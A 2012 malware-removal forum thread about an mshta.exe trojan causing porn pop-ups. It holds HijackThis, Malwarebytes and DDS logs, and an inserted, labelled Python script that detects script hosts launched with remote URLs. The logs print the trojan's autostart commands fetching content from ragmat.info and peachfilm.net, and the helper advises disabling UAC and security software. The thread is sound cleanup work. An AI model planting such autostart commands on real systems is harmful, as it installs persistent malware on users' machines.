# mshta.exe Japanese porn popup



## gagraptor (May 23, 2012)

I am constantly getting a pop-up from a Japanese porn site, and the process it uses is MSHTA.exe. If I kill the process, it pops up again after 15 or so minutes. I have included my HijackThis log below. Also, I ran Process Explorer on mshta, and the command line under Image is

C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:14:56 PM, on 5/23/2012
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.19222)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\Downloads\HijackThis.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
O2 - BHO: Increase performance and video formats for your HTML5 - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

--
End of file - 9444 bytes

Please help, this is driving me nuts; I'm not keen on reformatting.


----------



## Mark1956 (May 7, 2011)

Hi Gagraptor, and welcome to TSG. My name is Mark and I will be helping you.

At the top of the Malware forum there is a notice *Everyone MUST read this BEFORE posting for help in this forum*.

As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow *ALL* the instructions and post the logs that are requested.

*DO NOT* make any attempt to delete *mshta.exe* as it is a legitimate system file.

I would also like you to do the following and post the logs, as follows:
Put the logs into separate posts if it makes it easier.

*STEP 1*
Run HijackThis, and press *"Scan."* When the scan is complete place a *check mark* next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
*NOTE* For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
For Vista, click on *Start* and type *User Accounts* in the search box and hit *Enter*, click on *Turn User Account Control on or off*, uncheck the box to turn off *UAC*. For Windows 7 click on Start and type *UAC* in the box and hit *Enter*, then move the slider all the way to the bottom and click on *ok*. *This action is not required for Windows XP.*

*O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)*
*O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)*

After checking these items *CLOSE ALL open windows* except HijackThis and click *"Fix Checked"* to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose *YES.* Once it has fixed them, close HijackThis.
If you receive an error message that indicates HJT cannot remove the entries please try disabling your security software. *How to disable your security software*
If after disabling your security software there is still a problem, this could be due to the Malware on your system.
Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
Follow this by opening HJT, go to the *Main Menu* and Click on *"Do a system scan and save logfile."* When the log pops up in *Notepad,* copy and paste that file back here in your next reply.

*STEP 2*

Please download *Malwarebytes Anti-Malware* and save it to your desktop.

*Important!!* When you save the mbam-setup file, rename it to something random (such as 123abc.exe) *before* beginning the download.
Double-click on the renamed file to install, then follow these instructions for doing a *Quick Scan* in normal mode.
Don't forget to _*check for database definition updates*_ through the program's interface (*preferable method*) before scanning.
_If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues_.
Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's TeaTimer), they may interfere or alert you. Temporarily disable such programs or permit them to *allow* the changes.

Double click on the *Malwarebytes* icon on your desktop to launch the program
Under the *Scanner* tab, make sure the *Perform Quick Scan* option is selected.
Click on the *Scan* button.
When finished, a message box will say "_The scan completed successfully. Click *Show Results* to display all objects found_".
Click *OK* to close the message box, then click the *Show Results* button to see a list of any malware that was found.
Make sure that *everything is checked* and then click *Remove Selected*.
When removal is completed, a log report will open in Notepad.
The log is automatically saved and can be viewed by clicking the *Logs* tab.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
Exit Malwarebytes when done.
_If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. *Failure to reboot normally* will prevent Malwarebytes from removing all the malware._

_Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again *requires registration and purchase of a license key* that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license; you can just use it as a stand-alone scanner._
*NOTE:* Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).
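As an added illustration (not part of this thread or of any tool mentioned in it), here is the check a helper would run over the O4 lines in the log posted above: it flags autostart entries that hand a legitimate script host such as mshta.exe a remote URL, which is exactly the pattern in that log, without touching the executable itself. The sample lines are copied from the posted HijackThis log plus two benign entries; the regexes and function names are my own.

```python
"""Audit HijackThis O4 (autostart) entries for script hosts launched with remote URLs."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Legitimate Windows binaries that will execute whatever script content they are
# handed on the command line. The binary must not be deleted; the Run/RunOnce
# entry that points it at a remote URL is what needs removing.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# O4 - HKCU\..\Run: [Name] command      or      O4 - HKUS\S-1-5-19\..\RunOnce: [Name] command
O4_RE = re.compile(
    r"^O4 - (?P<hive>HK[^\\]+(?:\\[^\\]+)?)\\\.\.\\(?P<key>Run(?:Once)?): "
    r"\[(?P<name>[^\]]*)\] (?P<cmd>.*)$"
)
# First token of the command: a quoted path, or everything up to the first space
# (an unquoted path containing spaces is therefore truncated; acceptable here,
# since the script hosts we care about are short bare names).
EXE_RE = re.compile(r'^"(?P<q>[^"]+)"|^(?P<u>\S+)')
# DDS defangs http as hxxp; accept both so DDS pseudo-HJT output can be fed in too.
URL_RE = re.compile(r"h(?:tt|xx)ps?://\S+", re.IGNORECASE)


@dataclass
class AutostartEntry:
    hive: str
    key: str
    name: str
    command: str
    exe: str
    urls: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A script host alone is normal (rundll32 runs half of Windows); a script
        # host fed a remote URL at logon is the signal.
        return self.exe in SCRIPT_HOSTS and bool(self.urls)


def parse_o4(line: str) -> AutostartEntry | None:
    """Parse one HijackThis O4 line; return None for any other line type."""
    m = O4_RE.match(line.strip())
    if not m:
        return None
    cmd = re.sub(r"\s*\(User '[^']*'\)$", "", m.group("cmd"))  # drop HJT's user annotation
    em = EXE_RE.match(cmd)
    exe_path = (em.group("q") or em.group("u")) if em else ""
    return AutostartEntry(
        hive=m.group("hive"), key=m.group("key"), name=m.group("name"), command=cmd,
        exe=ntpath.basename(exe_path).lower(), urls=URL_RE.findall(cmd),
    )


def audit(log_text: str) -> list[AutostartEntry]:
    """Return the O4 entries that launch a script host with a remote URL."""
    entries = (parse_o4(line) for line in log_text.splitlines())
    return [e for e in entries if e is not None and e.suspicious]


def remote_hosts(findings: list[AutostartEntry]) -> dict[str, list[str]]:
    """Group findings by the remote host they fetch from, so the Run and RunOnce
    copies that re-create each other show up side by side."""
    by_host: dict[str, list[str]] = {}
    for e in findings:
        for u in e.urls:
            by_host.setdefault(urlparse(u).netloc.lower(), []).append(f"{e.hive}\\{e.key}\\{e.name}")
    return by_host


# Constructed sample: lines copied from the HijackThis log posted above, plus
# benign entries (a quoted path, and rundll32 with a local DLL) that must not fire.
SAMPLE_LOG = r"""O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
"""

if __name__ == "__main__":
    found = audit(SAMPLE_LOG)
    for e in found:
        print(f"{e.hive}\\{e.key} [{e.name}] -> {e.exe} {e.urls}")
    for host, entries in remote_hosts(found).items():
        print(f"{host}: {len(entries)} autostart entries fetch from this host")
```

Run against the full log, it reports only the three HKCU entries, leaving every vendor Run key and mshta.exe itself alone.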


----------



## gagraptor (May 23, 2012)

I am sorry, I forgot to add the other logs. I have followed your instructions. I already had Malwarebytes; when I run it I get 3 trojans and I'm asked to restart, and after restarting, when I run Malwarebytes again I get the same 3 viruses. I am not able to run GMER as my system freezes.
I'm including all the other logs. PS: I also have virtual drive emulation software but can't find it to uninstall.


----------



## gagraptor (May 23, 2012)

Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/28/2012 1:28:46 AM
mbam-log-2012-05-28 (01-28-46).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 204053
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)


----------



## gagraptor (May 23, 2012)

.
DDS (Ver_2011-08-26.01) - NTFSx86 
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 3:16:57 on 2012-05-28
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\rundll32.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\System32\alg.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\rundll32.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mStart Page = hxxp://home.sweetim.com
mDefault_Page_URL = hxxp://www.yahoo.com/
mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
mSearchAssistant = 
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: DivX Plus Web Player HTML5 : {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [<NO NAME>] 
uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
